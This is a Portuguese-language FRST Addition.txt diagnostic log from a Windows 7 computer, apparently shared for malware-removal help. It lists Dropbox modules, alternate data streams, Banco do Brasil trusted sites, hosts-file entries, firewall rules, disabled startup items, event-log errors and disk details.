2015-12-15 18:48 - 2015-10-30 22:59 - 00392144 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\pythoncom27.dll
2015-12-15 18:48 - 2015-12-08 19:36 - 00381752 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32com.shell.shell.pyd
2015-12-15 18:48 - 2015-10-30 22:59 - 00692688 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\unicodedata.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00020816 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._constant_time.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00109520 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\_cffi_backend.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 01737032 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._openssl.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00020808 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._padding.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00020800 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\_cffi_python_x66cf7a7cx17a72769.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00021840 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\_cffi_unicode_environ_win32_x8bf8e68bx9968e850.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00038696 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\fastpath.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00024528 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32event.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00020936 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\mmapfile.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00114640 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32security.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00021320 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\_cffi_pywin_kernel32_xde9e4433x360333f0.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00124880 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32file.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00030160 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32pipe.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00043472 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32process.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00175560 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32gui.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00028616 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32ts.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00024016 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32clipboard.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00048592 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32service.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00024392 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\librsyncffi.compiled._librsyncffi.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00036296 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\librsync.dll
2015-12-15 18:48 - 2015-10-30 23:00 - 00024016 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\win32profile.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00117056 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\breakpad.client.windows.handler.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00023376 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\winscreenshot.compiled._CaptureScreenshot.pyd
2015-12-15 18:48 - 2015-10-30 22:59 - 00134608 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\_elementtree.pyd
2015-12-15 18:48 - 2015-10-30 22:59 - 00134088 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\pyexpat.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00240584 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\jpegtran.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00020280 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\cpuid.compiled._cpuid.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00052024 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\psutil._psutil_windows.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00021304 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\Crypto.Util.strxor.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00350152 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\winxpgui.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00084792 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\dropbox_sqlite_ext.DLL
2015-12-15 18:48 - 2015-12-08 19:36 - 01826608 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\PyQt5.QtCore.pyd
2015-12-15 18:48 - 2015-10-30 23:00 - 00083912 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\sip.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 03891504 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\PyQt5.QtWidgets.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 01950000 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\PyQt5.QtGui.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00519984 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\PyQt5.QtNetwork.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00133936 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\PyQt5.QtWebKit.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00225080 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\PyQt5.QtWebKitWidgets.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00207672 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\PyQt5.QtPrintSupport.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00024904 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\_cffi_wpad_proxy_win_x752e3d61xdcfdcc84.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00486704 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\PyQt5.QtQuick.pyd
2015-12-15 18:48 - 2015-12-08 19:36 - 00357680 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\PyQt5.QtQml.pyd
2015-10-16 09:30 - 2015-10-30 23:01 - 00019920 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\QtQuick.2\qtquick2plugin.dll
2015-10-03 21:49 - 2015-10-30 23:00 - 00786904 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\QtQuick\Controls\qtquickcontrolsplugin.dll
2015-10-16 09:30 - 2015-10-30 23:00 - 00063448 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\QtQuick\Layouts\qquicklayoutsplugin.dll
2015-10-16 09:30 - 2015-10-30 23:00 - 00019408 _____ () C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\QtQuick\Window.2\windowplugin.dll
2014-10-29 19:01 - 2014-10-29 19:01 - 01382048 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\cpprest100_1_2.dll
2013-09-05 01:14 - 2013-09-05 01:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2016-02-04 22:27 - 2016-02-03 05:27 - 01632584 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.103\libglesv2.dll
2016-02-04 22:27 - 2016-02-03 05:27 - 00087880 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.103\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(Se uma entrada for incluída na fixlist, somente o ADS será removido.)

AlternateDataStreams: C:\Program Files (x86)\GbPlugin:IncompleteStartProcessProtection.cnt
AlternateDataStreams: C:\Program Files (x86)\GbPlugin:u6eBQrM0Z2K3FKLVBMG8dY3IkKT2rqFO+Sf68h8fDg==
AlternateDataStreams: C:\Windows\System32:522FBA16_Bb.gbp
AlternateDataStreams: C:\Windows\system32\Drivers\gbpddfac64.sys:X5ZN8aGvT4
AlternateDataStreams: C:\Windows\system32\Drivers\wsddfac.sys:X5ZN8aGXs4

==================== Modo de Segurança (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)


==================== EXE Associação (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)


==================== Internet Explorer confiável/restrito ===============

(Se uma entrada for incluída na fixlist, será removida do Registro.)

IE trusted site: HKU\S-1-5-21-1084134890-3557609745-897204792-1001\...\bancobrasil.com.br -> www.bancobrasil.com.br
IE trusted site: HKU\S-1-5-21-1084134890-3557609745-897204792-1001\...\bb.com.br -> hxxps://seg.bb.com.br

==================== Hosts Conteúdo: ==========================

(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)

2009-07-14 00:34 - 2016-01-30 14:01 - 00000170 ____N C:\Windows\system32\Drivers\etc\hosts

127.0.0.1 localhost
127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com

==================== Outras Áreas ============================

(Atualmente não há nenhuma correção automática para esta seção.)

HKU\S-1-5-21-1084134890-3557609745-897204792-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Volkhadan\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 201.17.128.71 - 201.17.128.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.

==================== MSCONFIG/TASK MANAGER ítens desabilitados ==

(Atualmente não há nenhuma correção automática para esta seção.)

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^RealPlayer Cloud Service UI.lnk => C:\Windows\pss\RealPlayer Cloud Service UI.lnk.CommonStartup
MSCONFIG\startupreg: Adobe Creative Cloud => "C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe" --showwindow=false --onOSstartup=true
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: Spotify => "C:\Users\Volkhadan\AppData\Roaming\Spotify\Spotify.exe" /uri spotify:autostart
MSCONFIG\startupreg: Spotify Web Helper => "C:\Users\Volkhadan\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"
MSCONFIG\startupreg: TkBellExe => "C:\Program Files (x86)\Real\RealPlayer\update\realsched.exe" -osboot

==================== Regras do Firewall (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{56338F08-A179-47C8-9727-79CB8EBBDD73}] => (Allow) C:\Users\Volkhadan\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{9306C707-B832-4215-983F-03E66CD20198}] => (Allow) C:\Users\Volkhadan\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{8FFE69A6-4DE7-45F8-90C6-2F6273CB9CB0}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{6BE9482F-A61F-4CCD-9CB6-50B0F7990A14}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{D07E50B8-5DBE-463E-89E9-EB5BA5ECC254}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{2F9F4A8A-6C58-4788-B122-55CDCB4DF77E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Broforce The Expendables Missions\Expendabros.exe
FirewallRules: [{C220ED82-A771-4697-BDC9-B2C0489F5C85}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Broforce The Expendables Missions\Expendabros.exe
FirewallRules: [{3DA8166A-4C1F-4F51-9CED-EABE15EC1FED}] => (Allow) C:\Users\Volkhadan\AppData\Local\Facebook\Video\Skype\FacebookVideoCalling.exe
FirewallRules: [{30013C0C-A5A5-4B1B-AD6E-93D436B26AA2}] => (Allow) C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{C0993DA4-2350-4ED9-8CF1-E86139044676}] => (Allow) C:\Users\Volkhadan\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [TCP Query User{D17C0BAE-D9BF-4D5C-8709-D14594C9C276}C:\users\volkhadan\appdata\roaming\dropbox\bin\dropbox.exe] => (Allow) C:\users\volkhadan\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{260C7E9B-E349-42F3-B08F-72C8746B3750}C:\users\volkhadan\appdata\roaming\dropbox\bin\dropbox.exe] => (Allow) C:\users\volkhadan\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{4B7CE363-3237-41F1-9BA3-3DD5B132EC04}] => (Allow) C:\Users\Volkhadan\AppData\Roaming\Spotify\spotify.exe
FirewallRules: [{389BA128-508B-4447-A35A-5608E7DCA8AC}] => (Allow) C:\Users\Volkhadan\AppData\Roaming\Spotify\spotify.exe
FirewallRules: [{5BC6D2E6-9290-4053-A11C-9623899EF734}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{1FEFF9B0-A09A-4A4B-A4F3-FBF82F880665}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{D08D0765-3379-437D-BC30-29B61E0CDFF1}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{AAF61E2D-19BB-4101-B4D2-6626C7684A18}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{92C984F3-27BF-4159-8966-8ED2392A4182}] => (Allow) c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe
FirewallRules: [TCP Query User{E3933CD7-F88C-44BE-A438-9A170393AFD8}C:\users\volkhadan\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\volkhadan\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{23D26AE4-DEE6-4291-BE75-E1B608ABDCD0}C:\users\volkhadan\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\volkhadan\appdata\roaming\spotify\spotify.exe
FirewallRules: [{EECAFA99-A5E7-4124-8F61-5E44FCB156C0}] => (Allow) C:\Program Files\Diebold\Warsaw\core.exe
FirewallRules: [{8FEF84CE-26EE-419B-AC85-5744C9104720}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{933CF983-10E7-48C3-A74B-6B2C9E6D6567}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{51F4F2C0-6519-4BBF-81BB-9AABD3BD4B34}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{51F9AE77-799D-4846-A535-98E9ED15B74B}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D0E509DD-F9B7-4285-B690-DB0EC7784817}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Pontos de Restauração =========================


==================== Dispositivos Apresentando Falhas No Gerenciador =============

Name: Teredo Tunneling Pseudo-Interface
Description: Adaptador de Túnel Teredo da Microsoft
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.


==================== Erros no Log de eventos: =========================

Erros em Aplicativos:
==================
Error: (02/06/2016 11:21:40 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (02/06/2016 12:54:55 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (02/05/2016 09:00:47 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (02/05/2016 08:22:45 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (02/05/2016 08:01:35 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (02/05/2016 06:41:04 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (02/05/2016 06:38:07 PM) (Source: Chrome) (EventID: 1) (User: AUTORIDADE NT)
Description: Chrome has encountered a fatal error.
ver=48.0.2564.103;lang=;guid=3DC2E39EB11B43E2AE2F63CBAD67BA2B;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\426dddd6-9a8e-4f9e-81ed-9fddca2b7c4b.dmp

Error: (02/05/2016 06:37:58 PM) (Source: Chrome) (EventID: 1) (User: AUTORIDADE NT)
Description: Chrome has encountered a fatal error.
ver=48.0.2564.103;lang=;guid=3DC2E39EB11B43E2AE2F63CBAD67BA2B;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\810f55d6-3bb7-4cf6-b33f-7582106bd19e.dmp

Error: (02/05/2016 06:37:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: chrome.exe, versão: 48.0.2564.103, carimbo de hora: 0x56b12600
Nome do módulo de falhas: ntdll.dll, versão: 6.1.7601.19110, carimbo de hora: 0x5684255b
Código de exceção: 0xc0000374
Deslocamento com falha: 0x000ced0b
Identificação do processo com falha: 0x588
Hora de início do aplicativo com falha: 0xchrome.exe0
Caminho do aplicativo com falha: chrome.exe1
FCaminho do módulo de falhas: chrome.exe2
Identificação do Relatório: chrome.exe3

Error: (02/05/2016 06:34:56 PM) (Source: Chrome) (EventID: 1) (User: AUTORIDADE NT)
Description: Chrome has encountered a fatal error.
ver=48.0.2564.103;lang=;guid=3DC2E39EB11B43E2AE2F63CBAD67BA2B;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\2677c972-d009-4fd7-80ba-7b970bb66461.dmp


Erros de Sistema:
=============
Error: (02/06/2016 11:23:54 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Gbpddreg svc devido ao seguinte erro:
%%2

Error: (02/06/2016 11:21:18 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: Específico do aplicativoLocalIniciar{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}AUTORIDADE NTSISTEMAS-1-5-18LocalHost (Usando LRPC)

Error: (02/06/2016 11:20:30 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Gbpddreg svc devido ao seguinte erro:
%%2

Error: (02/06/2016 11:20:24 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Falha ao carregar o(s) seguinte(s) driver(s) de início do sistema ou de inicialização:
gbpddreg
MPCKpt

Error: (02/06/2016 12:56:28 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Gbpddreg svc devido ao seguinte erro:
%%2

Error: (02/06/2016 12:54:56 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Gbpddreg svc devido ao seguinte erro:
%%2

Error: (02/06/2016 12:54:32 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: Específico do aplicativoLocalIniciar{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}AUTORIDADE NTSISTEMAS-1-5-18LocalHost (Usando LRPC)

Error: (02/06/2016 12:53:51 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Falha ao carregar o(s) seguinte(s) driver(s) de início do sistema ou de inicialização:
gbpddreg
MPCKpt

Error: (02/05/2016 10:21:53 PM) (Source: volsnap) (EventID: 36) (User: )
Description: As cópias de sombra do volume C: foram anuladas porque o armazenamento de cópia de sombra não pôde crescer devido a um limite imposto pelo usuário.

Error: (02/05/2016 09:54:25 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {995C996E-D918-4A8C-A302-45719A6F4EA7}


CodeIntegrity:
===================================
Date: 2016-02-05 19:55:42.233
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-02-05 19:55:42.156
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-02-05 19:55:42.078
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-02-05 19:55:41.998
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-01-30 16:59:45.041
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-01-30 16:59:44.961
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-01-30 16:59:44.881
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-01-30 16:59:44.806
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2015-08-16 11:01:21.273
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2015-08-16 11:01:21.223
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


==================== Informações da Memória ===========================

Processador: Pentium(R) Dual-Core CPU T4300 @ 2.10GHz
Percentagem de memória em uso: 66%
RAM física total: 3932.88 MB
RAM física disponível: 1329.73 MB
Virtual Total: 7863.96 MB
Virtual disponível: 5033.18 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:149.34 GB) (Free:7.03 GB) NTFS
Drive d: (Data) (Fixed) (Total:148.65 GB) (Free:9.95 GB) NTFS

==================== MBR & Tabela de Partições ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 65806F0B)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=149.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=148.7 GB) - (Type=07 NTFS)

==================== Fim de Addition.txt ============================
